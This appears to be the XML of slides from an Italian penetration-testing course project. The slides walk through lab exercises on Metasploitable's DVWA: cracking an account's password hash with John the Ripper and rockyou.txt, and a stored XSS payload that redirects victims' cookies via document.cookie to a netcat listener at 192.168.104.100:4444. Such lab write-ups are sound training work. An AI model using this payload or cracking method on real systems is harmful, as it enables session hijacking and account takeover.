                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="61801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5557262" y="5143500"/>
            <a:ext cx="7173476" cy="2038495"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1889310" cy="536888"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 6" id="6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1889310" cy="536888"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="536888" w="1889310">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1889310" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1889310" y="536888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="536888"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 7" id="7"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="19050"/>
              <a:ext cx="1889310" cy="517838"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2664"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 8" id="8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="5760891" y="5379442"/>
            <a:ext cx="6766219" cy="1566610"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1566610" w="6766219">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6766218" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6766218" y="1566611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1566611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>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144000" y="5143500"/>
            <a:ext cx="9006609" cy="2055515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2055515" w="9006609">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9006609" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9006609" y="2055515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2055515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="9144000" y="2256089"/>
            <a:ext cx="9006609" cy="1905244"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1905244" w="9006609">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9006609" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9006609" y="1905244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1905244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9144000" y="6242192"/>
            <a:ext cx="3267075" cy="425308"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="860464" cy="112015"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 6" id="6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="860464" cy="112015"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="112015" w="860464">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="860464" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="860464" y="112015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="112015"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="95250" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3131"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 7" id="7"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="19050"/>
              <a:ext cx="860464" cy="92965"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2664"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 9" id="9"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="364482" y="319405"/>
            <a:ext cx="7903218" cy="95815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Individuata la password in codice HASH dell’account PabloPicasso, passiamo alla conversione del codice HASH in chiaro.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Col programma John The Ripper potremo effettuare il cracking di questo codice HASH.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Creiamo un txt col codice HASH, come da immagine a destra in alto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Subito dopo, utilizzeremo JtR in combinazione con la lista “rockyou.txt” che ci permetterà di decrittare il codice HASH. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Una volta decrittata, avremo un risultato simile a quello in figura in basso a destra.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2338989" cy="6283768"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="16451985" cy="8378358"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 3" id="3"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="66675"/>
              <a:ext cx="16451985" cy="3039816"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="8880"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="8000" spc="-240">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Bold"/>
                </a:rPr>
                <a:t>Giorno 2- Web Application Exploit XSS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 4" id="4"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="3790985"/>
              <a:ext cx="15564712" cy="4587372"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="3900"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2999">
                  <a:solidFill>
                    <a:srgbClr val="57FFDC"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Bold"/>
                </a:rPr>
                <a:t>UTILIZZANDO LE TECNICHE VISTE NELLE LEZIONE TEORICHE, SFRUTTARE LA VULNERABILITÀ XSS PERSISTENTE PRESENTE SULLA WEB APPLICATION DVWA AL FINE SIMULARE IL FURTO DI UNA SESSIONE DI UN UTENTE LECITO DEL SITO, INOLTRANDO I COOKIE «RUBATI» A UN WEB SERVER SOTTO IL VOSTRO CONTROLLO. SPIEGARE IL SIGNIFICATO DELLO SCRIPT UTILIZZATO.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>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5289355" y="1047750"/>
            <a:ext cx="1969945" cy="336959"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="2664"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk Bold"/>
              </a:rPr>
              <a:t>BUILD WEEK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548342" y="1849213"/>
            <a:ext cx="8248639" cy="5737413"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5737413" w="8248639">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8248640" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8248640" y="5737413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5737413"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="357086" y="1394012"/>
            <a:ext cx="9191257" cy="658114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Prima di effettuare un attacco XSS Stored, procediamo alla verifica dell’effettiva vulnerabilità del database della DVWA di Metasploitable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Inseriamo una voce casuale nel database e poi andiamo a verificare se la stessa sia visibile attraverso la console del sito.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>In questo caso, essendo visibile, possiamo procedere all’attacco.</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249615" y="3167809"/>
            <a:ext cx="8687645" cy="714281"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="714281" w="8687645">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8687645" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8687645" y="714281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="714281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="9249615" y="4664118"/>
            <a:ext cx="8687645" cy="3106013"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3106013" w="8687645">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8687645" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8687645" y="3106013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3106013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="-47227" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="357086" y="319405"/>
            <a:ext cx="8786914" cy="9581515"/>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Procediamo con l’inserimento dello script malevolo, ma prima dobbiamo modificare il numero massimo di caratteri da poter inserire </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>tramite la console del sito.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk Bold"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t> apre la scrittura dello stesso script;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk Bold"/>
              </a:rPr>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t> fornisce informazioni sull’URL del browser e ci permette di navigare verso un nuovo URL;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk Bold"/>
              </a:rPr>
              <a:t>http://192.168.104.100:4444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t> è lo URL base al quale il browser verrà reindirizzato;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk Bold"/>
              </a:rPr>
              <a:t>+document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t> restituisce, appunto, il cookie. In questo caso, il documento contiene una lista separata in colonne con coppie di valori chiave che rappresentano i cookie associati al documento stesso.</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020202" y="3815740"/>
            <a:ext cx="10109078" cy="2448960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2448960" w="10109078">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10109078" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10109078" y="2448960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2448960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 4" id="4"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="13383058" y="686943"/>
            <a:ext cx="3876242" cy="341757"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2664"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk Bold"/>
              </a:rPr>
              <a:t>BUILD WEEK  - GIORNO 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="305564" y="1819592"/>
            <a:ext cx="7378659" cy="6581140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Impostato lo script, prima di avviarlo, iniziamo una sessione di NetCat sul nostro Kali e lo mettiamo in ascolto sulla porta di riferimento 4444.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Avviato lo script, avremo questo risultato presentato in figura a destra:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>nel rettangolo rosso, avremo il cookie di sessione che stavamo cercando, insieme ad altre varie info sul sistema operativo della macchina vittima.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 6" id="6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="11393774" y="3923723"/>
            <a:ext cx="4847069" cy="425308"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1276594" cy="112015"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 7" id="7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1276594" cy="112015"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="112015" w="1276594">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1276594" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1276594" y="112015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="112015"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="19050" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3131"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 8" id="8"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="19050"/>
              <a:ext cx="1276594" cy="92965"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2664"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 9" id="9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9296400" y="4479032"/>
            <a:ext cx="4967286" cy="295307"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1308256" cy="77776"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 10" id="10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
